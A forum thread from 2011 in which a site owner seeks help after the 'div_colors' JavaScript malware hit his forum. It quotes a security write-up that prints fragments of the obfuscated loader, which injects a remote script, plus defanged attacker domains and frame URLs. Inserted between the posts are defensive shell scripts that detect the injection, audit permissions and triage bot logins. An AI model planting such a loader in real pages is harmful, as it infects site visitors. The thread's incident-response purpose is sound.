Forum hacked with malware - how to remove... and defend?

Started by gornde, March 30, 2011, 03:51:51 AM


gornde

Hello,

My page is hxxp:ww.gorn.de [nonactive]. My page has been infected today with: hxxp:sucuri.net [nonactive] / malware / malware-entry-mwjs1240

How can I remove it? And how can I prevent this?

Thanks for the help... and I really do need help!

Gorn

gornde

I removed it... but I really don't know how to prevent these attacks... please help me.

Because I can't link anything... I quote:

Quote: We are still seeing a big growth in the number of sites infected with the div_colors malware string. In fact, the osCommerce forums are full of people asking about it, uncertain what to do, and what it does.

So, what is this div_colors stuff? It is malware that targets osCommerce installations and adds the following obfuscated code to the pages:

    if (typeof(redef_colors)=="undefined") {
    var div_colors = new Array('#4b8272', '#81787f', '#832f83', '#887f74', '#4c3183', '#748783', '#3e7970', '#857082', '#728178', '#7f8331', '#2f8281', '#724c31', '#778383', '#7f493e', '#3e7a84', '#82837e', '#40403d', '#727e7c', '#3e7982', '#3e7980', '#847481', '#883d7c', '#787d3d', '#7f777f', '#314d00');..

    var redef_colors = 1;
    var colors_picked = 0;

    function div_pick_colors(t,styled) {
    ..


As you can see, it looks like valid JavaScript, and that's what is confusing a lot of people. In fact, what it does is load a new (and malicious) JavaScript element from an external web site, as you can see here:

    var new_cstyle=document.createElement("script");
    new_cstyle.type="text/javascript";
    new_cstyle.src=div_pick_colors(div_colors,0);
    document.getElementsByTagName("head")[0].appendChild(new_cstyle);

Where is it loading the malicious code from?

Right now, it is loading from hxxp:tongho.co.th/engine/ [nonactive], but a few hours ago, it was using a different domain name, and it changes every few hours! The code is also mutating, and every infected site has a backdoor to load the new variation every once in a while.

This is a list of some of the domains used so far:

    hxxp:tongho.co.th/engine/ [nonactive]

    hxxp:againstvirusxpsoft.com [nonactive]
    hxxp:antiagencyxpsoft.com [nonactive]
    hxxp:antivirixpsoft.com [nonactive]
    hxxp:antivirusxpeasy.com [nonactive]
    hxxp:antivirusxphard.com [nonactive]
    hxxp:antivirusxpinfected.com [nonactive]
    hxxp:antivirusxpsoftcentral.com [nonactive]
    hxxp:antivirusxpsoft.com [nonactive]
    hxxp:antivirusxpsoftonline.com [nonactive]
    hxxp:egyptantivirusxp.com [nonactive]
    hxxp:infectedvirusxpsoft.com [nonactive]
    hxxp:myantivirusxpsoft.com [nonactive]
    hxxp:myxpscanantivirus.com [nonactive]
    hxxp:protestersantivirusxp.com [nonactive]
    hxxp:protestersantivirusxpsoft.com [nonactive]
    hxxp:protesterscanantivirus.com [nonactive]
    hxxp:protesterscanantivirusxp.com [nonactive]
    hxxp:protestersscanantivirus.com [nonactive]
    hxxp:protestersvirusxpsoft.com [nonactive]
    hxxp:scanantivirixp.com [nonactive]
    hxxp:theantivirusxpsoft.com [nonactive]
    hxxp:thexpscanantivirus.com [nonactive]
    hxxp:webantivirusxpsoft.com [nonactive]
    hxxp:webxpscanantivirus.com [nonactive]
    hxxp:xpexamineantivirus.com [nonactive]
    hxxp:xpscanagainstvirus.com [nonactive]
    hxxp:xpscanantiagency.com [nonactive]
    hxxp:xpscanantibacteria.com [nonactive]
    hxxp:xpscanantiviri.com [nonactive]
    hxxp:xpscanantiviruscentral.com [nonactive]
    hxxp:xpscanantivirus.com [nonactive]
    hxxp:xpscanantivirusonline.com [nonactive]
    hxxp:xpscanantivirusprotesters.com [nonactive]
    hxxp:xpscanwarvirus.com [nonactive]
    hxxp:xpseeantivirus.com [nonactive]

As you can see by the common domain names, it is trying to push the infamous fake AV.

Here is the frame created by the first intermediary, which is also changing:

    <frame src="hxxp:86.55.140.203/index2.php [nonactive]" ..
    <frame src="hxxp:solomon-vl.cz.cc/show.php?key=fcfe7c10d4f05fa29b45456408269fdc&u= [nonactive]..

It's a very complex malware, and every osCommerce user needs to make sure their site is secure. The file_manager.php file needs to be removed, and the admin directory renamed and protected.
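As an added example (not part of the quoted Sucuri post, and not code from SMF or osCommerce), here is a small POSIX shell script that scans a web root for the identifiers of the injected div_colors loader quoted above and checks whether the osCommerce admin/file_manager.php that the quote says to remove is still present. The three marker names come from the quoted snippet; the sample directory tree and file names it builds are constructed for the demonstration.

```shell
#!/bin/sh
# Added example: locate pages carrying the div_colors injection quoted above.
# The three identifiers are taken from the obfuscated loader; the sample tree
# and file names below are constructed for this demonstration.

INJECTION_MARKERS='redef_colors|div_pick_colors|div_colors'

# Print the path of every regular file under the given root that contains at
# least one marker. Exit status is grep's (0 = at least one hit, 1 = clean).
find_injected() {
    grep -rlE "$INJECTION_MARKERS" "$1" 2>/dev/null
}

# Number of files carrying a marker, as a plain integer (0 for a clean tree).
count_injected() {
    find_injected "$1" | wc -l | tr -d ' '
}

# The quoted osCommerce advice: admin/file_manager.php must be removed.
# Returns 0 (true) while the file is still there, 1 once it is gone.
file_manager_present() {
    [ -f "$1/admin/file_manager.php" ]
}

# Build a constructed sample web root: two clean files, one page carrying the
# first lines of the injected loader, and a leftover admin/file_manager.php.
make_infected_sample() {
    root=$(mktemp -d)
    mkdir -p "$root/catalog" "$root/admin"
    printf '<?php echo "clean"; ?>\n' > "$root/catalog/index.php"
    printf '<html><body>hello</body></html>\n' > "$root/index.html"
    {
        printf '<html><body>shop</body>\n<script>\n'
        printf 'if (typeof(redef_colors)=="undefined") {\n'
        printf 'var div_colors = new Array("#4b8272");\n'
        printf 'var redef_colors = 1;\n}\n</script></html>\n'
    } > "$root/catalog/product_info.php"
    # constructed stand-in for the real file, so the check has something to find
    printf '<?php /* stand-in */ ?>\n' > "$root/admin/file_manager.php"
    printf '%s\n' "$root"
}

# Stand-alone run: report on the constructed sample, then clean up.
if [ "${1:-}" = "--demo" ]; then
    root=$(make_infected_sample)
    echo "files carrying the injection under $root:"
    find_injected "$root"
    echo "count: $(count_injected "$root")"
    if file_manager_present "$root"; then
        echo "warning: admin/file_manager.php is still present; remove it"
    fi
    rm -rf "$root"
fi
```

Run it with `--demo` to see the report on the constructed tree, or call `find_injected /path/to/htdocs` against a real document root. The quoted post says the code mutates and the loader domains change every few hours, so a grep for these three names only catches the variant shown here; it is a first pass for finding which pages were touched, not a substitute for restoring the site from a copy known to be clean.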

ziycon

I would recommend you restore your whole site/forum from a recent backup taken before the problems started to occur, and then consult your hosting company on how to secure your site from this type of attack. Have you got a very easy-to-guess FTP password or a file upload function on your site?

gornde

You think that it was not a script attack on SMF? More a server-side attack?

ziycon

It could have been done many ways depending on your hosting setup and what your site is serving. It's just to rule out that the attack came through your site as opposed to the host or another means.

Arantor

Well, there are no known security vulnerabilities in SMF at the present time; such attacks are usually through improper permissions or configurations on the server side, or vulnerabilities in other scripts present on the server.

gornde

Oh OK, then I have to check my folder permissions... Is there a "list" of which folders or files need more than 644 permission?


Oh, one moment: the problem occurred after installing the Firewall Mod. All files of this mod had 755 permission... maybe it came in this way.

Are there some useful security mods?

Arantor

Quote: Is there a "list" of which folders or files need more than 644 permission?

No file needs beyond 644 (folders themselves have to be 755, but the files within 644) normally, except for:
* attachments folder has to be writable to be able to add attachments
* files and folders tend to need higher permissions when installing mods because mods modify the raw files directly

755 is only slightly different from 644; all it means is that the file is 'executable', a flag which has no meaning for most PHP files, certainly not SMF's or mod PHP files.
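As an added example (not from Arantor's post or from SMF itself), the rule above turned into a POSIX shell audit: list every file that is not 644 and every directory that is not 755, leave the attachments directory alone because it has to stay writable, and optionally reset the tree. The sample tree it builds is constructed; the path names only imitate SMF's layout.

```shell
#!/bin/sh
# Added example: audit a forum tree against the rule above (files 644,
# directories 755, attachments/ allowed to be writable) and optionally fix it.
# The sample tree below is constructed; its names only imitate SMF's layout.

# Print every regular file that is not 644 and every directory that is not 755,
# skipping attachments/ and everything inside it.
audit_perms() {
    root=$1
    find "$root" -type f ! -perm 644 ! -path "$root/attachments/*"
    find "$root" -type d ! -perm 755 ! -path "$root/attachments" ! -path "$root/attachments/*"
}

# Number of offending entries, as a plain integer (0 when the tree conforms).
count_offending() {
    audit_perms "$1" | wc -l | tr -d ' '
}

# Reset directories to 755 and files to 644 outside attachments/, which is the
# state a mod install tends to leave behind at 755 or 666.
fix_perms() {
    root=$1
    find "$root" -type d ! -path "$root/attachments" ! -path "$root/attachments/*" -exec chmod 755 {} +
    find "$root" -type f ! -path "$root/attachments/*" -exec chmod 644 {} +
}

# Build a constructed sample: a mod left Sources/Load.php at 755, a theme file
# at 666 and the Themes directory at 777; attachments/ is 777 on purpose.
make_perm_sample() {
    root=$(mktemp -d)
    chmod 755 "$root"
    mkdir -p "$root/Sources" "$root/Themes/default" "$root/attachments"
    : > "$root/index.php";                chmod 644 "$root/index.php"
    : > "$root/Sources/Load.php";         chmod 755 "$root/Sources/Load.php"
    : > "$root/Themes/default/style.css"; chmod 666 "$root/Themes/default/style.css"
    : > "$root/attachments/upload.dat";   chmod 666 "$root/attachments/upload.dat"
    chmod 755 "$root/Sources" "$root/Themes/default"
    chmod 777 "$root/Themes" "$root/attachments"
    printf '%s\n' "$root"
}

# Stand-alone run: show the offenders, fix them, show the count afterwards.
if [ "${1:-}" = "--demo" ]; then
    root=$(make_perm_sample)
    echo "before:"
    audit_perms "$root"
    fix_perms "$root"
    echo "after: $(count_offending "$root") entries left"
    rm -rf "$root"
fi
```

On a real install, run `audit_perms /path/to/forum` first and read the list before calling `fix_perms`: anything that shows up outside a mod install is worth understanding, and a directory other than attachments/ that genuinely needs to be writable (a cache directory, for instance) would need its own exclusion.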

gornde

OK, thanks. Then I really don't know how this malware came in....

Maybe we will see each other tomorrow... but hopefully it won't come back. THX

Here is some more info:

http:// networkedblogs. com/fY7bu

gornde

Hi all.

My board is still up. I installed the Firewall mod... and now I see that my log gets flooded.

About every 4 to 10 seconds, one entry like this:

Quote: 590    Keep-Alive    2011-03-31 05:22:01    GET /index.php?board=1.0;sort=last_post HTTP/1.0 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; FDM) hxxp:www.gorn.de/index.php?board=1.0;sort=last_post [nonactive]    Invalid ip!
589    Keep-Alive    2011-03-31 05:21:57    GET /index.php?board=1.0 HTTP/1.0 Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; FDM) hxxp:www.gorn.de/index.php?board=1.0 [nonactive]    Invalid ip!

Or bots trying to access (this is not a USER!):

Quote: 675    Keep-Alive    2011-03-31 08:21:31    POSTuser: taliajaxBaw passwrd: 9IsptQy481 cookielength: 60 submit: Login hash_passwrd: /index.php?action=login2 HTTP/1.0 Opera/9.00 (Windows NT 4.0; U; en) hxxp:www.gorn.de/index.php?action=login [nonactive]    Invalid ip!

Do you have the same count of entries?
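As an added example (not from the thread and not the Firewall mod's own code), a POSIX shell script that triages log entries of the kind quoted above: it counts the login POSTs, counts the entries the mod tagged "Invalid ip!", and measures how close together consecutive hits are. The tab-separated column layout (id, connection, timestamp, request line, user agent, client address or status) is an assumption made for the demonstration, and the sample lines are constructed to mirror the quoted ones.

```shell
#!/bin/sh
# Added example: triage log entries like the ones quoted above. The column
# layout (tab-separated id, connection, timestamp, request line, user agent,
# client address or status) is assumed; the lines are constructed to mirror
# the quoted entries.

# Write the constructed sample log to the file named in $1.
make_log_sample() {
    {
        printf '590\tKeep-Alive\t2011-03-31 05:22:01\tGET /index.php?board=1.0;sort=last_post HTTP/1.0\tMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; FDM)\tInvalid ip!\n'
        printf '589\tKeep-Alive\t2011-03-31 05:21:57\tGET /index.php?board=1.0 HTTP/1.0\tMozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; .NET CLR 1.1.4322; FDM)\tInvalid ip!\n'
        printf '676\tKeep-Alive\t2011-03-31 08:21:34\tPOST /index.php?action=login2 HTTP/1.0\tOpera/9.00 (Windows NT 4.0; U; en)\tInvalid ip!\n'
        printf '675\tKeep-Alive\t2011-03-31 08:21:31\tPOST /index.php?action=login2 HTTP/1.0\tOpera/9.00 (Windows NT 4.0; U; en)\tInvalid ip!\n'
        printf '700\tKeep-Alive\t2011-03-31 09:00:00\tGET /index.php HTTP/1.1\tMozilla/5.0 (X11; Linux)\t203.0.113.9\n'
    } > "$1"
}

# Login attempts: POST requests to action=login2, the bot hits quoted above.
count_login_posts() {
    awk -F '\t' '$4 ~ /^POST / && $4 ~ /action=login2/ { n++ } END { print n + 0 }' "$1"
}

# Entries where the mod could not resolve a client address.
count_missing_ip() {
    awk -F '\t' '$6 == "Invalid ip!" { n++ } END { print n + 0 }' "$1"
}

# Smallest gap, in seconds, between consecutive entries after sorting by
# timestamp (same-day entries); a gap of a few seconds is a bot, not a reader.
# Prints -1 when there are fewer than two entries.
min_gap_seconds() {
    sort -k3,4 "$1" | awk -F '\t' '
        { split($3, dt, " "); split(dt[2], t, ":")
          s = t[1] * 3600 + t[2] * 60 + t[3]
          if (NR == 1) min = -1
          else if (min < 0 || s - prev < min) min = s - prev
          prev = s }
        END { if (NR > 1) print min; else print -1 }'
}

# Stand-alone run: summarise the constructed sample, then clean up.
if [ "${1:-}" = "--demo" ]; then
    log=$(mktemp)
    make_log_sample "$log"
    echo "login POSTs:               $(count_login_posts "$log")"
    echo "entries without client IP: $(count_missing_ip "$log")"
    echo "closest two hits:          $(min_gap_seconds "$log")s apart"
    rm -f "$log"
fi
```

What "Invalid ip!" means is not stated in the thread; if it means the mod is not seeing a client address at all (for instance because the site sits behind a proxy and the address is in a header the mod does not read), then any per-address blocking or rate limiting it does cannot work, so that is worth checking before comparing entry counts with anyone else's log.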
